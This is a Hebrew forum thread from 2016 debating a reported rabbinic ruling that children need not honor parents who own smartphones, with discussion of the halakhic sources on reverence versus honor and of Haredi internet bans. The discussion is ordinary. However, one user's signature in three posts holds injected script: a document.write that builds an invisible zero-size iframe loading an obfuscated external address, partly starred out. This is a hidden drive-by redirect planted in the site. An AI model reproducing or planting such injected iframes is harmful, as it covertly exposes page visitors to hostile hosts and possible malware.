בית פורומים עצור כאן חושבים

עקירת אחד מעשרה דיבריא על ידי הרב נוסבוים

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-10/5/2016 06:32 לינק ישיר 
עקירת אחד מעשרה דיבריא על ידי הרב נוסבוים

פורסם אתמול כאן ב"בחדרי", כי הרב נפתלי נוסבוים הכריז אתמול שאדם שאביו או אמו מחזיקים בסמארטפון אינו מחוייב בכיבוד אב ואם. כנראה מדובר בעקירת דבר מן התורה למיגדר מילתא, תקדים ללא ספק, האם יש כאן בפורום מי ששמע את דבריו בכנס?

דווח על תוכן פוגעני

נשלח ב-13/5/2016 06:19 לינק ישיר 

שו"ת יחווה דעת חלק ה סימן נו: 

שאלה: תלמיד שחשקה נפשו בתורה וברצונו לעבור מבית הספר לישיבה קדושה שעוסקים בה בתורה במשך כל שעות היום, והוריו דורשים ממנו בכל תוקף לעבור לישיבה תיכונית, האם חייב להישמע להוריו משום מצות כיבוד אב ואם?

דדווח על תוכן פוגעני

נשלח ב-11/5/2016 18:21 לינק ישיר 

שמח בחור

צר לי שלא הבהרת את הוכחתי, ויפה עשית שבדקת את שני הצדדים וענית על שניהם. סליחה שהטרחתיך. כוונתי היתה כמובן למה שאתה מביא בשם הראשונים, ואנתח ביתר פירוט.

האב אומר: עשה איקס.

כאשר איקס במקרה דנן הוא מעשה אסור, חילול שבת.

עתה היתה הווה אמינא (אפשרות שמתקיימת אילולא סיבה אחרת) שאכן הבן חייב לציית. אלא שיש לימוד מפסוק שעד כדי כך אין חייבים (בלי לדון בטעם מדוע כי לא זה הקובע כאן).

מכאן אנו למדים שכאשר האב מטיל על הבן מעשה מסויים, מגדרי כיבוד הורים הוא לציית.

כמובן הסברה מוקשית. האם כבוד האב הוא זכותו של האב לתבוע מהבן לנהל את חייו לפי פקודות האב? כך זה נראה לפי אותה הווה אמינא.

איני יודע על תשובה לשאלה זו. אלא אם כן נאמר שאכן אין כזו חובה אלא נמציא כאן אוקימתא (מקרה מיוחד). כגון שהיתה אבידה של אביו בבית הקברות ושניהם כהנים והאב מצוה על הבן להיכנס ולהיטמא ולהחזיר, ואף כאן האב זקוק למשהו מיוחד (כגון אבידה) ולשם כך הבן יצטרך לחלל שבת. אבל לא שכל רציה של האב שאותה הוא מבטא במילים היא אכן כלולה בכיבוד הורים.

לגבי השאלה השניה, לא הבנתי אותה. האם כוונתך לומר שלא מצאת מי שמבדיל ואומר כי מורא אב קיים גם אצל אב עבריין אבל חובה לכבדו אינה נוהגת?

לפי מה שראיתי במקום אחר, זו אמורה להיות מחלוקת הרמב"ם והטור. אבל לא עסקתי בזמן האחרון בנושא זה ואיני זוכר זאת. ובכל מקרה, דרכי בלימוד ובפסק היא לעיין במקורות ולהכריע מתוך ההבנה. זו אינה דרך מקובלת אבל איני היחיד שהולך בה, אם כי - גילוי נאות - אני מקצין בה יותר מאותם מעטים שכן נקטו בה.

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-11/5/2016 13:45 לינק ישיר 

הרב מיימוני

כתבת להוכיח שגם הדרישה לציית להוראותיו של מאן דהוא היא כבודו ממה שאמרו חכמים יכול אמר לו אביו לחלל את השבת ישמע לו תלמוד לומר אני ה' כולכם חייבים בכבודי עד כאן דבריך

והנה לא פירשת כוונתך, האם כוונתך להוכיח ממה שהיינו סבורים שחייב לשמוע בקול אביו לחלל את השבת הרי שגם זה הוא כבוד, או שכוונתך להוכיח מסיום הציטוט כולכם חייבים בכבודי הרי שציות לדבר הא-ל הוא כבודו

ומכיון שלא פירשת אשיב על שניהם על ההוכחה הא' תשובתי היא שמכיון שהחכמים במאמר זה לא באו לפרש לנו מהו כבוד הם לא טרחו לפרש את המקרה לפרטיו אלא דיברו על נקודת הנידון והיא כיבוד הדורש מהבן לחלל שבת, והמקרה כיד הדמיון הטובה עלינו שחוט לי, בשל לי, הדלק לי את המזגן, וכו', וכ"כ הראשונים
ועל ההוכחה הב' תשובתי היא כי ציות לדבר הא-ל מראה על אמון בסמכותו וזהו כבודו אבל ציות לדבר האב אינו משום סמכותו אלא משום סמכות הא-ל שציוה על כך וא"כ אין בזה כבוד לאב

מה שכתבתי בתגובתי הקודמת הוא שלא התייחסת למה שכתבתי שלא מצאתי סובר שחלוק כבוד ממורא

תודה על הדיון המחכים

תוקן על ידי שמחבחור ב- 11/05/2016 13:47:30

דדווח על תוכן פוגעני

נשלח ב-11/5/2016 11:05 לינק ישיר 

<כולנו ראינו כבר אלפי מודעות על "טלפון כשר", וכל הרבנים מתחרים ביניהם מי ינקוט בלשון נלהבת יותר. מישהו ראה מודעות רבנים שמבשרות על "פרנסה כשרה"?! שמעתם פעם על יוזמה של רבנים להכשרה מקצועית?! >

הרבנים זכו ומלאכתם נעשית ע"י אחרים.

דדווח על תוכן פוגעני

נשלח ב-11/5/2016 08:56 לינק ישיר 

שמח בחור

איני יכול להתחרות בבקיאותך אלא רק לעיין מחדש בסוגיות.

אינטואיטיבית, אתה צודק שיש הבדל בין כבוד לבין "לשמוע בקולו". אמנם מה נעשה שחכמים שאלו (אני כותב מהזכרון): יכול שאמר לו אביו לחלל שבת יהיה חייב, תלמוד לומר כולכם חייבים בכבודי. ומכאן משמע שגם הדרישה לציית להוראותיו של מאן דהוא זהו כבודו.

ואמנם אני סבור לאור דבריך שאכן יש לחלק בין כבוד במובן של להראות כבוד (כגון לעמוד בפניו) לבין כבוד במובן של לציית למשאלותיו. ואיני יודע בינתים איך לענות לשאלה האם כל רצון וכל גחמה של מי שנקבע שמגיע לו כבוד האם צריך לציית.

טול איקון ירוק (לשון שבח והודאה על הסימן שהיה קיים פעם למטרה זו) על הרחבותיך בנושא.

כתבת:

לא התייחסת למה שכ' של"מ סובר שחלוק כבוד ממורא

תוכל לפתוח את ראשי התיבות של "ל"מ"? אני משער ש"למה שכ' " דהיינו "למה שכתבתי". דע שתמיד עדיף לכתוב מלא ורצוי גם עם תירגום של התיבות הארמיות לעברית, מאחר שלא כל חברינו בקיאים בלשון חכמים ובסוגיות, אבל כולם באים על מנת ללמוד.

דדווח על תוכן פוגעני

נשלח ב-10/5/2016 16:57 לינק ישיר 

ישראל גרינהויז

מישהו סיפר שבכינוס של גור אמרו שבן לא צריך לבקר אבא שמחזיק אייפון, וכל האתרים גועשים. קאט דה בולשיט. ביררתי אצל כמה מחברי שהיו בכנס, מה בדיוק נאמר שם. ובכן, יש אנשים מבוגרים שיש להם בבית מחשב לא מסונן, והוא נגיש לילדים שמגיעים לשם. השאלה היתה אם להביא את הנכדים לסבא, כשיש סיכון שהם ייחשפו לאינטרנט לא מסונן. אף אחד לא העלה בכלל את השאלה על בן בוגר, שאחראי למעשיו. ברור שבן צריך להגיע להוריו, ולבקר אותם ולא את האינטרנט.
בכנות, איו כאן שום חידוש. לפני דור ושנים, רבים מהדור המבוגר החזיקו טלוויזיה בבית, והורים התלבטו באותה השאלה. רבים נמנעו מלהביא את הנכדים, וניסו בצורה עדינה לשמר את הקשר החשוב הזה, בלי הסיכון הרוחני.
בכלל, מי שחושב שבכינוס אתמול יכול היה דבר כזה להאמר, לא הבין בכלל את רוח הדברים. כל הכינוס אתמול היה כינוס כניעה, הנפת דגל לבן, והודאה בטעות.
רק לפני חמש - שבע שנים, כל הסגנון היה שונה. הרבנים דברו גבוהה גבוהה, המילה אינטרנט לא הוזכרה בכלל בשם המפורש, וההצהרה הרשמית היתה "מיגרנו את הטלויזיה, נמגר גם את הטכנולוגיה הזו". סיפרו על מי שהגיע לרב לומר שהוא צריך לפרנסתו אינטרנט, והרב שואל אותו בסרקזם "ואם לא תמצא עבודה אחרת, האם תפתח אטליז לממכר דבר אחר?"
באותם הימים הודיעו חגיגית שאסור להחזיק מחשב עם אינטרנט בבית, ויהי מה. היום אומרים ש"צריך להימנע ככל האפשר". אז הודיעו שבטלפונים כשרים יהיו רק שיחות, והיום מתירים מכשירים מסוננים, ו"לא להוציאם בפרהסיא".
בכלל, מכל האיסור החמור והנורא נשאר הביטוי שחוזר על עצמו שוב ושוב "עד כמה שאפשר". מעולם לא ראיתי ספר בהלכות שבת, שכותב שראוי להמנע מטלטול מוקצה עד כמה שאפשר, ואם צריך מאוד יעשה זאת שלא בפרהסיא, ולא בתוך הבית...
זה היה כנס שלא נאסר בו שום דבר חדש. להיפך. כנס שכולו הכרה בחדירת האינטרנט, כולו הודאה בעובדה שאין שום סיכוי להסתדר בלעדיו, רק מבקשים להזכיר לציבור שסכנתו מרובה, ויש להזהר "עד כמה שאפשר".
הרכבת ברחה מזמן. אי אפשר לפרנס כיום משפחה בלי אינטרנט. גם אלו שכביכול לא משתמשים בו, נעזרים בו בדרך עקיפה. וכמו שנאמר באחד הסעיפים בחוברת שחולקה לבאי הכנס, "הנזקק למידע או לשירות המחייב שימוש במחשב, יוכל להעזר בחבר או בקרוב שברשותו מחשב החסום כראוי".
= = =
ומילה לרבנים:
אי אפשר לקחת את תפקיד האוסרים והסוהרים, ולקוות שאנשים יקבלו את זה. אם הייתם רוצים באמת למגר את בעיית האינטרנט, חפשו לאנשיכם דרכים אחרות להתפרנס. אפשר היה ללמד בחורים מלאכה קלה, כמו צורפות, תיקון מכשירי חשמל, או כל מלאכה ש(כמעט ו)לא צריך להזדקק לאינטרנט. אפשר להקים קהילה שתתפרנס בכבוד ובהיתר, אבל צריך להחליף דיסק. לא לסתור איניש בי כנישתא, עד דבני בי כנישתא אחריתי. אי אפשר לאסור, בלי לתת חלופה סבירה. כיום אנחנו במצב של "כל אשר לאיש יתן בעד נפשו", ו"לא יבוזו לגנב כי יגנוב למלא נפשו כי ירעב". כשלאנשים אין מאיפה להביא אוכל לילדים, לא יעזור שום איסור חרם וקונם.
כולנו ראינו כבר אלפי מודעות על "טלפון כשר", וכל הרבנים מתחרים ביניהם מי ינקוט בלשון נלהבת יותר. מישהו ראה מודעות רבנים שמבשרות על "פרנסה כשרה"?! שמעתם פעם על יוזמה של רבנים להכשרה מקצועית?! והרי הדברים הפוכים, על כל יוזמה ללימוד מקצוע, קופצים הרבנים ואוסרים אותה. אסור בגרות, אסור מכללות, אסור אקדמיה, אסור ואסור, כביכול כולם מסודרים כמו הרבנים על משכורות שמנות מהקהילה.
כחסידים, גדלנו על האמירה מהזוהר "איתפשטותא דמשה בכל דרא ודרא". להזכירכם, משה רבינו לא רק הוריד את התורה. הוא גם הוריד לנו "מן בזכות משה", ו"הגיז לנו את השליו".
אבל הרבי מגור, בגלל מלחמה מטופשת עם ר' שאול אלתר, הכריח את מועצת גדולי התורה להוציא מכתב שאומר "אין תפקידו של בית יעקב לדאוג לפרנסתם של בתי ישראל". ברגע הזה, הוא איבד את המושכות, וכנראה שזה כבר אל-חזור.

נשלח מהאנדרואיד שלי

דדווח על תוכן פוגעני

סמל אישי
נשלח ב-10/5/2016 16:14 לינק ישיר 

מיימוני כתב:
שמח בחור

ברוך הבא אל הפורום!

ברוך הנמצא/הממציא?

תודה על המקורות שהוספת.

תודה על ההתייחסות

לגבי המושג של "מורא" שמסתבר ששקול ל"יראה", מהי באמת יראה? האם זה רגש הלב או ביטוי מעשי שלו?

לא ירדתי לכוונתך, האם אתה מסתפק האם יראה במובן המילולי היא רגש או מעשה, כתבת "או ביטוי מעשי שלו"  מה שמביא אותי להניח שגם לפי הצד השני שלך חייב להיות רגש, וא"כ אינני מבין למה להניח שהכוונה גם למעשה, או שכוונתך שהיא הביטוי של יראה באופן עקרוני אבל לא כלפי האב ונצטוינו לנהוג לאב במעשים שנוהג בהם הירא ממי שהוא ירא הימנו

אם זה ביטוי מעשי, האם אפשר לראות בתירגום שלי לאיסור לבזות או לצער תירגום נאות או ממצה?
לטעמי לא ממצה, כי ישיבה במקומו וכו' לטעמי איננה ביזוי וצער, ויתכן שאף לא נאות כי איסור הוא שלילה ומורא לטעמי הוא חיוב

כתבתי קודם בקיצור רב וכנראה טעיתי, או בזיהוי הזה בין יראה=איסור לצער ולבזות או באי הסבר מורחב...

לגבי חיוב כבוד שמתפרש אצל חכמינו גם בתור חובה להאכילו ולהשקותו, אני הבנתי בלמדי סוגיה זו שאלו הם רצונות האב, וכבוד האב מתפרש בתור חובה למלא רצונותיו ודרישותיו. ואכן דנו פוסקים במשך הדורות עד כמה רחבה החובה לשמוע בקול האב, ואם למשל האב אוסר עליו להתחתן עם אשה פלונית או להפך תובע ממנו לשאת אותה, האם החובה כוללת גם דבר זה.

אכן התוס' הביאו מהירושלמי שחכמים אמרו לר"י שיניח לאמו לשתות מהמים וכו' ובענין זה הוא כבודו [אולי משם הביטוי רצונו של אדם הוא כבודו] ומזה משמע כדבריך, אבל לדעתי רחוק הוא שכל הפירוט של חכמינו בענין הכבוד הוא לומר מה רצונו של אדם בסתם, 
ועוד שדבריך צריכים הגדרה האם רק דרישה חייבים למלא או גם רצון, אם גם רצון אז גם כשיודע שהאב רוצה שישא אשה פלונית וכו' יהא חייב לשמוע בקולו, וזה לא עלה ע"ד אדם כמדומני, אם רק דרישה מדוע האב שמחל על כבודו הוצרו חכמים ללמדינו שכבודו מחול והרב שמחל יש הסובר שאינו מחול הרי כשמחל אינו דורש ואי"ז כבודו
אכן בד' הראשונים מפורש [למעט הבנת הגר"א בד' הרשב"א] שאין חיוב כבוד לציית בקולו אלא לצרכיו

לגבי זה שיש מחלוקת בין הרמב"ם לטור האם יש חובה לציית לאב עובר עבירה, תודה על הסיכום הזה מפני ששכחתיו והרי חייבים להוסיפו.

לא התייחסת למה שכ' של"מ סובר שחלוק כבוד ממורא

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

תוקן על ידי שמחבחור ב- 10/05/2016 16:15:41

דדווח על תוכן פוגעני

נשלח ב-10/5/2016 15:23 לינק ישיר 

פתיאמי

שאלת האם אדם שאינו מציית לתקנה הקהילתית בדבר אחד, אפילו דבר מהותי שמוצג כעקרוני, כמו השימוש במכשיר לא "כשר", האם אין זה אומר שנפלט מן הקהילה.

איני יודע מה התשובה מפני שצריך קודם לברר מי מגדיר את גבולות הקהילה. והאם בכלל יש מודעות לשאלה הזו שלך.

בכל אופן, שאלתך גוררת את השאלה הבאה: מה החובות של מי שהפך לחסיד גור והוריו אינם כאלו.

אלא שמשום מה יש לי ספק גדול אם יימצא כזה אדם בעולם. לפחות לפי האופן שחסידי גור נתפסים היום בציבור.

השאלה יכלה להיות יותר רלוונטית לאשה שנישאה לחסיד גור ובעצמה אינה בת לאותה קהילה, והוריה מחזיקים את המכשיר הלא "כשר". הרי אין הם מחוייבים בתקנות הפנימיות או לפחות אין בסיס לתבוע מהם את הדרישה הזו.

ואמנם דומה שיש כאן הרחבה של הדרישה. מי שהוא חבר קהילית גור מצפים ממנו שיתרחק מכל אדם שמחזיק את המכשיר הפסול. אלא שאז באמת ניתן לשאול איזו הצדקה הלכתית יש לביטול כיבוד הורים על בסיס כזה (אלא שממילא אשה פטורה מכיבוד הורים כיון שהיא תחת בעלה...).

דדווח על תוכן פוגעני

נשלח ב-10/5/2016 15:19 לינק ישיר 

שמח בחור

ברוך הבא אל הפורום!

תודה על המקורות שהוספת.

לגבי המושג של "מורא" שמסתבר ששקול ל"יראה", מהי באמת יראה? האם זה רגש הלב או ביטוי מעשי שלו? אם זה ביטוי מעשי, האם אפשר לראות בתירגום שלי לאיסור לבזות או לצער תירגום נאות או ממצה?

כתבתי קודם בקיצור רב וכנראה טעיתי, או בזיהוי הזה בין יראה=איסור לצער ולבזות או באי הסבר מורחב...

לגבי חיוב כבוד שמתפרש אצל חכמינו גם בתור חובה להאכילו ולהשקותו, אני הבנתי בלמדי סוגיה זו שאלו הם רצונות האב, וכבוד האב מתפרש בתור חובה למלא רצונותיו ודרישותיו. ואכן דנו פוסקים במשך הדורות עד כמה רחבה החובה לשמוע בקול האב, ואם למשל האב אוסר עליו להתחתן עם אשה פלונית או להפך תובע ממנו לשאת אותה, האם החובה כוללת גם דבר זה.

לגבי זה שיש מחלוקת בין הרמב"ם לטור האם יש חובה לציית לאב עובר עבירה, תודה על הסיכום הזה מפני ששכחתיו והרי חייבים להוסיפו.

לגבי השאלה איך פוסקים במחלוקת כזו, אז זוהי עצמה מחלוקת על האופן שבו מכריעים במחלוקת. האם יעשה כל אחד כמנהג רבותיו וקהילתו (למשל אשכנזים וספרדים לפי מנהג הפסיקה המקובל), או שצריך ללמוד את המקורות מחדש ולברר, או שיש להחמיר במידת האפשר, ועוד.

לגבי הטלויזיה, אכן לא בארתי ואבאר כעת. יש המצאות טכנולוגיות שמערערות את סדרי החיים המקובלים ופותחות פתח לעולם הרחב ואף מאיימות על הנאמנות להלכה. הטלויזיה כמדומה היתה ההמצאה הראשונה מסוגה. הרדיו שהופיע לפניה לא היה איום כזה ואכן מעניין לברר מדוע. בין השאר, לפי זכרונותי שלי מילדותי, מפני שלא היו בו דברים מהסוג שהופיעו מאוחר יותר, כמו פריצות וערעור על אמונות מקובלות. הרי בימים הרחוקים ההם גם עיתוני שמאל, למשל, לא שללו את המסורת אלא רק לא שמרו מצוות בעצמם.

לפיכך ייראה לי שהטלויזיה היתה הראשונה להיתפס כאיום ונגדה התנהלה מלחמה גדולה, שאכן הסתיימה בהצלחה, ודומה שהגדרתו של החרדי כחרדי כוללת אי שימוש ב"מכשיר".

המלחמה נגד המחשב נחלה כשלון מפני שהתברר שזה מכשיר שאי אפשר בלעדיו.

עתה על הפרק מלחמה באינטרנט ומלחמה בתחליפי מחשב המציעים אפילו יותר ממנו, כמו הסמארטפונים.

ולכן מעניין לדעתי להשוות את התקנות שנקבעו בשעתו נגד הטלויזיה ומחזיקיה לתקנות שיש היום נגד מחזיקי הסלולריים שאינם "כשרים".

דדווח על תוכן פוגעני

נשלח ב-10/5/2016 14:08 לינק ישיר 

הרב מיימוני כתב:

לגבי הסעיף השני, יש אכן לעיין בדיני כיבוד. כידוע יש הבדל בין מורא, שזה איסור לצער את ההורה ולבזותו, לבין כבוד, שזה חיוב לשמוע בקולו.

מורא אין פירושו איסור לצער ולבזות  אלא מצוה לירא וקיומה הוא בלא ישב במקומו וכו' וכמובן שנכלל בזה גם שלא לצער ולבזות וכבוד אין פירושו חיוב לשמוע בקולו אלא מאכילו משקהו וכו' 

מורא חל גם באב עבריין. כבוד, זה כבר נתון כמדומה במחלוקת (אלא שאני כותב מהזכרון את הרושם שלי ולא מעיון עכשו כראוי).

רמב"ם פ"ו ממרים הי"א סובר שחייב בכבודו ומוראו, הטור יו"ד סי' ר"מ ורמ"א סובר שאינו חייב בכבודו אבל אסור
להכותו ולקללו והש"ך סי' ר"מ נקט שאף לצערו אסור, [ושי' ר"ת דאף להכותו מותר] השו"ע פסק כהרמב"ם והרמ"א הביא את ד' הטור, ל"מ מי שמחלק בין כבוד למורא

איך נהגו בעבר במי שעבר על הוראת הרבנים (הכללית עד כמה שידוע לי) והחזיק טלויזיה בבית? האם הבנים החרימו את ההורים? נדמה שהיו מגיעים בעצמם אבל לא היו מביאים את הילדים, או שמא אני טועה?

לא הבנתי למה השאלה הזו רלוונטית

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

[/quote]

תוקן על ידי שמחבחור ב- 10/05/2016 14:10:49

דדווח על תוכן פוגעני

נשלח ב-10/5/2016 09:23 לינק ישיר 

יש לחקור
לרעייתי ולי יש סמארטפונים.
לחלק מילדי יש ולחלק אין. אלו שאין להם נראה שיכולים לסמוך על ההיתר של הרב נוסבוים, אולם אלו שיש להם, הואיל ויש להם הפטור לא חל, או שהואיל וההורים מוגדרים ככאלו שאין חייבים בכבודם, אזי זה שהם עוברים על התקנה אינו מהווה סיבה לחייבם, ואדרבא כיבוד הורים כאלו לעבירה ייחשב, ומי שאכל שום וכו'.

תוקן על ידי בעלבעמיו ב- 10/05/2016 09:23:11

דדווח על תוכן פוגעני

נשלח ב-10/5/2016 08:37 לינק ישיר 

הרב מיימוני,

בסעיף ב' אתה שואל "איך יש לנהוג בהורים עבריינים על תקנה כזו?"

מובלעת בשאלה ההנחה שההורים הם חסידי גור, שאם הם אינם - הרי אינם מתחייבים בתקנות גור מלכתחילה...

ואפילו אם נניח שההורים היו הסטורית משפחה גורית, הרי ברגע שעברו על ה"תקנות" - מיד ואוטומטית הם נפלטים החוצה. כנלע"ד.

אז איך תקנה פנימית של קהילה עוקרת חיוב דאורייתא חיצוני?

דדווח על תוכן פוגעני

נשלח ב-10/5/2016 08:05 לינק ישיר 

פתיאמי

הנושא מעניין ללימוד. זה שילוב של דיון תורני, על כיבוד הורים כאשר ההורים עוברים על תקנת רבנים מאוחרת, ושילוב של דיון סוציולוגי, על התרבות שבה הופיע האיסור הזה.

הבקשה מחברינו להזדהות כמי שנכחו בכנס היא תמוהה. האם אין זה אאוטינג? ועוד יותר מעניין, האם יש חסידי חסידות זו בפורום שלנו? בעצם למה לא, אדם יכול להיות פתוח, חושב ובודק, בכל מקום בעולם.

לגבי השאלה של כיבוד הורים, יש כאן שני נושאים כאמור:

א. מה הם האיסורים הקשורים בפלאפון? מה מקורם? איך אפשר להצדיק את הטענה שהם מחייבים? מכוח מה?

ב. איך יש לנהוג בהורים עבריינים על תקנה כזו? האם יש כיבוד הורים באב שעובר על תקנות דרבנן? (או באם, אבל דומה שהשאלה תהיה מצויה יותר באב, ובכל אופן הדין שווה).

לגבי הסעיף הראשון, אם מדובר בקהילה שיש לה רב, האם הרב בעל סמכות לתקן תקנה לאלו הכפופים לו? האם יש גבול ליכולת לתקן תקנות שאינן נצרכות, אולי, לפי הדין?

לגבי הסעיף השני, יש אכן לעיין בדיני כיבוד. כידוע יש הבדל בין מורא, שזה איסור לצער את ההורה ולבזותו, לבין כבוד, שזה חיוב לשמוע בקולו. מורא חל גם באב עבריין. כבוד, זה כבר נתון כמדומה במחלוקת (אלא שאני כותב מהזכרון את הרושם שלי ולא מעיון עכשו כראוי).

ספצפית, הורים בתקופתנו זקוקים לביקורי הילדים שגדלו והנכדים. לכאורה זה אפילו יותר מאשר כיבוד. זו שמירה על קשר מול ניתוק.

איך נהגו בעבר במי שעבר על הוראת הרבנים (הכללית עד כמה שידוע לי) והחזיק טלויזיה בבית? האם הבנים החרימו את ההורים? נדמה שהיו מגיעים בעצמם אבל לא היו מביאים את הילדים, או שמא אני טועה?

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > עקירת אחד מעשרה דיבריא על ידי הרב נוסבוים
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר

bholext